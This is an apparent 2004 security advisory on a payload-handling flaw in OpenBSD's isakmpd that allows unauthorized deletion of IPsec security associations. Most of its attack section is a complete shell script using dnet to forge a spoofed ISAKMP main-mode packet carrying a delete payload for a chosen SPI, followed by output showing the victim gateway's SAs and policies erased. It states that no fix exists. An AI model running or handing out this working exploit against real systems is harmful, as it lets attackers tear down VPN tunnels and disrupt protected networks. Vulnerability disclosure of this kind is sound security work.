1 Abstract For nearly 10 months a handful of OpenBSD-developers is trying to fix a plethora of payload handling flaws in isakmpd. On 2004/01/13 they released something like a final patch to a broader public. The patch protects against some specific attacks, but does not solve the problem. 2 Description Unauthorized deletion of IPsec SAs is still possible using a delete payload piggybacked on a initiation of main mode. For more details trace message_recv() ff. with gdb during an attack. 3 Affected Systems All (recent) versions of isakmpd are affected. The attack has been successfully tested against the most recent CVS-version of isakmpd. 4 The Attack Here we go. There is an IPsec tunnel between sg-a and sg-b: sg-a# cat /kern/ipsec | grep SPI SPI = 97e49ca2, Destination = , Sproto = 50 SPI = 901e38d9, Destination = , Sproto = 50 The attacker built some little script, because this time he wants to shoot down a bunch of IPsec SAs: attacker# cat during_these_hostile_and_trying_times_and_what-not #!/bin/sh if [ ! $# -eq 3 ]; then echo "usage: $0 "; exit; fi src=$1; dst=$2 spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'` cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null` dnet hex \ $cky_i \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x01\x10\x02\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x00\x58" \ "\x0c\x00\x00\x2c" \ "\x00\x00\x00\x01" \ "\x00\x00\x00\x01" \ "\x00\x00\x00\x20" \ "\x01\x01\x00\x01" \ "\x00\x00\x00\x18" \ "\x00\x01\x00\x00" \ "\x80\x01\x00\x05" \ "\x80\x02\x00\x02" \ "\x80\x03\x00\x01" \ "\x80\x04\x00\x02" \ "\x00\x00\x00\x10" \ "\x00\x00\x00\x01" \ "\x03\x04\x00\x01" \ $spi | dnet udp sport 500 dport 500 | dnet ip proto udp src $src dst $dst | dnet send He fires up his script with appropriate parameters: attacker# ./during_these_hostile_and_trying_times_and_what-not \ > sg-b sg-a 901e38d9 And the victim's IPsec SAs _and_ policies fade away almost instantaneous: sg-a# cat /kern/ipsec Hashmask: 31, policy entries: 0 5 Solution? There are no bug fixes, yet. Thomas Walpuski